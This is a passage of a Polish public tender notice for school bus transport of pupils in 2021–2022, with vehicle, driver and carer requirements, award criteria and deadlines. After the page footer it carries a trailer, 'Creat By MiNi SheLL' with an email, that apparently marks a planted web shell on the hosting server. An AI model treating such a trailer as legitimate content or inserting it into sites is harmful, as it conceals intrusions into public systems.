wysiadania i przejazdu dzieci i uczniów busem/autobusem, a także na zewnątrz pojazdu (po jego zatrzymaniu) przy przechodzeniu uczniów przez jezdnię. Kierowca nie może być jednocześnie opiekunem.<br/>1.8. Wykonawca, z którym Zamawiający podpisze umowę na realizację usługi musi posiadać zezwolenie na wykonywanie przewozów regularnych specjalnych.<br/>1.9. Pojazd musi posiadać miejsca siedzące dla wszystkich przewożonych uczniów. Pojazd musi posiadać oznakowanie dla przewozu dzieci i młodzieży zgodne z obowiązującymi przepisami.<br/>1.10. W przypadku awarii pojazdu przewożącego uczniów, Wykonawca zobowiązany jest zapewnić transport pojazdem zastępczym spełniającym wymagania określone w postępowaniu.<br/>2. Ilość dni i ilość kilometrów została podana w celu wyliczenia ceny oferty i ta wartość będzie przyjęta do oceny ofert. Rozliczenie będzie odbywało się za faktyczne ilości dni i ilości przejechanych kilometrów, według podanej w ofercie ceny jednostkowej za 1 km.<br/>Zamawiający dopuszcza zmniejszenie lub zwiększenie świadczenia usługi w przypadku zmiany liczby dowożonych uczniów, zmiany trasy przewozów, itp. Ze względu na specyfikę usług, rozmiar przedmiotu zamówienia został określony szacunkowo. Rzeczywista ilość usług może ulec zmianie, przy czym Wykonawca nie będzie rościł pretensji ani żądał rekompensaty finansowej, jeżeli ilość ta będzie mniejsza niż szacowana.<br/>3. Na podstawie art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, osób wykonujących usługi objęte przedmiotem zamówienia: kierowców i opiekunów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-06-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Przewiduje się możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług na warunkach określonych w zamówieniu podstawowym, w trybie przewidzianym w art. 214 ust. 1 pkt 7 ustawy Pzp, jeżeli spełnione zostaną przesłanki tam określone, przy zachowaniu cen jednostkowych, oferowanych w zamówieniu podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach: łączna cena ofertowa brutto (C) oraz termin płatności faktury (T).<br/>2. Całkowita liczba punktów (L), jaką otrzyma dana oferta, zostanie obliczona wg wzoru: L = C + T.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>4. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>5. Ocena ofert będzie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca spełni warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli wykaże, że posiada licencję na wykonywanie krajowego transportu drogowego osób lub zezwolenie na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2021r. poz. 919 ze zm.).<br/>2. Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże, że:<br/>a) dysponuje środkiem transportu sprawnym technicznie i przystosowanym do wykonywania usługi przewozu osób określonej w przedmiocie zamówienia:<br/>• dla cz. 1. :<br/>– pojazd do przewozu min. 55 osób<br/>• dla cz. 2. :<br/>– pojazd do przewozu min. 8 osób<br/>• dla cz. 3. :<br/>– jeden pojazd do przewozu min. 6 osób (kursy dotyczące dowozu uczniów z Leśnych Domków),<br/>– jeden pojazd do przewozu min. 30 osób (pozostałe kursy).<br/>b) dysponuje następującymi osobami skierowanymi przez Wykonawcę do realizacji zamówienia, odpowiedzialnymi za świadczenie usługi określonej w przedmiocie zamówienia (kierowca + opiekun do każdego pojazdu):<br/>- kierowcami, posiadającymi uprawnienia odpowiedniej kategorii do kierowania pojazdami, posiadającymi zaświadczenia o aktualnych badaniach lekarskich i psychologicznych, stwierdzających brak przeciwwskazań do wykonywania pracy na stanowisku kierowcy (prawo jazdy z kodem „95” lub zaświadczenia o aktualnych badaniach lekarskich i psychologicznych) oraz posiadającymi min. 6-miesięczne doświadczenie w zakresie przewozu osób. Wymaga się, aby osoby były niekarane, posiadające pełną zdolność do czynności prawnych i korzystające z pełni praw publicznych;<br/>- osobami sprawującymi opiekę nad uczniami: pełnoletnimi, niekaranymi, posiadającymi pełną zdolność do czynności prawnych i korzystającymi z pełni praw publicznych. Wykonawca przedstawi informację, że dane tej osoby nie są zamieszczone w Rejestrze Sprawców Przestępstw na Tle Seksualnym (wydruk z rejestru) – podstawa prawna art. 21 ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (Dz. U. z 2020 r. poz. 152). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunku dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Zamawiający żąda od Wykonawcy:<br/>– licencji na wykonywanie krajowego transportu drogowego osób lub zezwolenia na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2021 r. poz. 919 ze zm.).<br/>2. W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej, Zamawiający żąda od Wykonawcy:<br/>– wykazu środków transportu, którymi dysponuje lub będzie dysponował Wykonawca przy realizacji zamówienia – załącznik nr 5 do SWZ;<br/>– wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca, którego oferta została wybrana, przed podpisaniem umowy zobowiązany jest przedłożyć potwierdzone za zgodność z oryginałem kserokopie:<br/>– dowodu rejestracyjnego,<br/>– prawa jazdy (gdy dokument bez kodu „95”, ważne zaświadczenia badań lekarskich i badań psychologicznych),<br/>– ważnej polisy OC i NNW,<br/>– Wydruku z Rejestru Sprawców Przestępstw na Tle Seksualnym z informacją, że dane opiekuna nie są w nim zamieszczone<br/>oraz oryginały oświadczeń:<br/>– kierowcy/opiekuna o zdolności do czynności prawnych i korzystania z pełni praw publicznych – załącznik nr 7 do SWZ<br/>– opiekuna o zapoznaniu się z obowiązkami i odpowiedzialnością za dzieci i młodzież przebywające pod ich opieką – załącznik nr 8 do SWZ.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com